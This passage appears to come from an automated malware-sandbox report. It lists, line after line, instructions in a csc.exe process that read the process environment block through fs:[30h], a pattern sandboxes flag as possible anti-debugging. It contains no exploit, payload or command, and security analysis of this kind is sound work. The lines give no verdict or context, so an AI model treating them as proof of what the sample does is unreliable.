Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0F525 mov eax, dword ptr fs:[00000030h]	6_2_05A0F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1B52F mov eax, dword ptr fs:[00000030h]	6_2_05A1B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35537 mov eax, dword ptr fs:[00000030h]	6_2_05A35537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05997505 mov eax, dword ptr fs:[00000030h]	6_2_05997505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05997505 mov ecx, dword ptr fs:[00000030h]	6_2_05997505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F6500 mov eax, dword ptr fs:[00000030h]	6_2_059F6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535 mov eax, dword ptr fs:[00000030h]	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D534 mov eax, dword ptr fs:[00000030h]	6_2_0596D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A34500 mov eax, dword ptr fs:[00000030h]	6_2_05A34500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E53E mov eax, dword ptr fs:[00000030h]	6_2_0598E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D530 mov eax, dword ptr fs:[00000030h]	6_2_0599D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D530 mov eax, dword ptr fs:[00000030h]	6_2_0599D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05968550 mov eax, dword ptr fs:[00000030h]	6_2_05968550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05968550 mov eax, dword ptr fs:[00000030h]	6_2_05968550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599B570 mov eax, dword ptr fs:[00000030h]	6_2_0599B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599B570 mov eax, dword ptr fs:[00000030h]	6_2_0599B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h]	6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h]	6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599656A mov eax, dword ptr fs:[00000030h]	6_2_0599656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B562 mov eax, dword ptr fs:[00000030h]	6_2_0595B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05969486 mov eax, dword ptr fs:[00000030h]	6_2_05969486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05969486 mov eax, dword ptr fs:[00000030h]	6_2_05969486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B480 mov eax, dword ptr fs:[00000030h]	6_2_0595B480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059934B0 mov eax, dword ptr fs:[00000030h]	6_2_059934B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059944B0 mov ecx, dword ptr fs:[00000030h]	6_2_059944B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EA4B0 mov eax, dword ptr fs:[00000030h]	6_2_059EA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059664AB mov eax, dword ptr fs:[00000030h]	6_2_059664AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A094E0 mov eax, dword ptr fs:[00000030h]	6_2_05A094E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059604E5 mov ecx, dword ptr fs:[00000030h]	6_2_059604E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A354DB mov eax, dword ptr fs:[00000030h]	6_2_05A354DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E7410 mov eax, dword ptr fs:[00000030h]	6_2_059E7410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598340D mov eax, dword ptr fs:[00000030h]	6_2_0598340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h]	6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h]	6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05998402 mov eax, dword ptr fs:[00000030h]	6_2_05998402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A430 mov eax, dword ptr fs:[00000030h]	6_2_0599A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C427 mov eax, dword ptr fs:[00000030h]	6_2_0595C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h]	6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h]	6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595E420 mov eax, dword ptr fs:[00000030h]	6_2_0595E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6420 mov eax, dword ptr fs:[00000030h]	6_2_059E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598245A mov eax, dword ptr fs:[00000030h]	6_2_0598245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595645D mov eax, dword ptr fs:[00000030h]	6_2_0595645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596B440 mov eax, dword ptr fs:[00000030h]	6_2_0596B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E443 mov eax, dword ptr fs:[00000030h]	6_2_0599E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3547F mov eax, dword ptr fs:[00000030h]	6_2_05A3547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h]	6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h]	6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598A470 mov eax, dword ptr fs:[00000030h]	6_2_0598A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F453 mov eax, dword ptr fs:[00000030h]	6_2_05A1F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460 mov eax, dword ptr fs:[00000030h]	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F460 mov eax, dword ptr fs:[00000030h]	6_2_0597F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EC460 mov ecx, dword ptr fs:[00000030h]	6_2_059EC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A337B6 mov eax, dword ptr fs:[00000030h]	6_2_05A337B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D7B0 mov eax, dword ptr fs:[00000030h]	6_2_0598D7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F78A mov eax, dword ptr fs:[00000030h]	6_2_05A1F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F7BA mov eax, dword ptr fs:[00000030h]	6_2_0595F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EF7AF mov eax, dword ptr fs:[00000030h]	6_2_059EF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E97A9 mov eax, dword ptr fs:[00000030h]	6_2_059E97A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059607AF mov eax, dword ptr fs:[00000030h]	6_2_059607AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0596C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h]	6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h]	6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059657C0 mov eax, dword ptr fs:[00000030h]	6_2_059657C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E07C3 mov eax, dword ptr fs:[00000030h]	6_2_059E07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059647FB mov eax, dword ptr fs:[00000030h]	6_2_059647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059647FB mov eax, dword ptr fs:[00000030h]	6_2_059647FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h]	6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h]	6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059827ED mov eax, dword ptr fs:[00000030h]	6_2_059827ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596D7E0 mov ecx, dword ptr fs:[00000030h]	6_2_0596D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EE7E1 mov eax, dword ptr fs:[00000030h]	6_2_059EE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960710 mov eax, dword ptr fs:[00000030h]	6_2_05960710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599F71F mov eax, dword ptr fs:[00000030h]	6_2_0599F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599F71F mov eax, dword ptr fs:[00000030h]	6_2_0599F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2972B mov eax, dword ptr fs:[00000030h]	6_2_05A2972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05990710 mov eax, dword ptr fs:[00000030h]	6_2_05990710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F72E mov eax, dword ptr fs:[00000030h]	6_2_05A1F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05965702 mov eax, dword ptr fs:[00000030h]	6_2_05965702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05965702 mov eax, dword ptr fs:[00000030h]	6_2_05965702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05967703 mov eax, dword ptr fs:[00000030h]	6_2_05967703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C700 mov eax, dword ptr fs:[00000030h]	6_2_0599C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B73C mov eax, dword ptr fs:[00000030h]	6_2_05A3B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599273C mov eax, dword ptr fs:[00000030h]	6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599273C mov ecx, dword ptr fs:[00000030h]	6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599273C mov eax, dword ptr fs:[00000030h]	6_2_0599273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959730 mov eax, dword ptr fs:[00000030h]	6_2_05959730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959730 mov eax, dword ptr fs:[00000030h]	6_2_05959730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596973A mov eax, dword ptr fs:[00000030h]	6_2_0596973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596973A mov eax, dword ptr fs:[00000030h]	6_2_0596973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DC730 mov eax, dword ptr fs:[00000030h]	6_2_059DC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05995734 mov eax, dword ptr fs:[00000030h]	6_2_05995734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05963720 mov eax, dword ptr fs:[00000030h]	6_2_05963720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h]	6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h]	6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597F720 mov eax, dword ptr fs:[00000030h]	6_2_0597F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C720 mov eax, dword ptr fs:[00000030h]	6_2_0599C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C720 mov eax, dword ptr fs:[00000030h]	6_2_0599C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EE75D mov eax, dword ptr fs:[00000030h]	6_2_059EE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960750 mov eax, dword ptr fs:[00000030h]	6_2_05960750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2750 mov eax, dword ptr fs:[00000030h]	6_2_059A2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2750 mov eax, dword ptr fs:[00000030h]	6_2_059A2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E4755 mov eax, dword ptr fs:[00000030h]	6_2_059E4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599674D mov esi, dword ptr fs:[00000030h]	6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599674D mov eax, dword ptr fs:[00000030h]	6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599674D mov eax, dword ptr fs:[00000030h]	6_2_0599674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h]	6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h]	6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973740 mov eax, dword ptr fs:[00000030h]	6_2_05973740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05968770 mov eax, dword ptr fs:[00000030h]	6_2_05968770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770 mov eax, dword ptr fs:[00000030h]	6_2_05970770
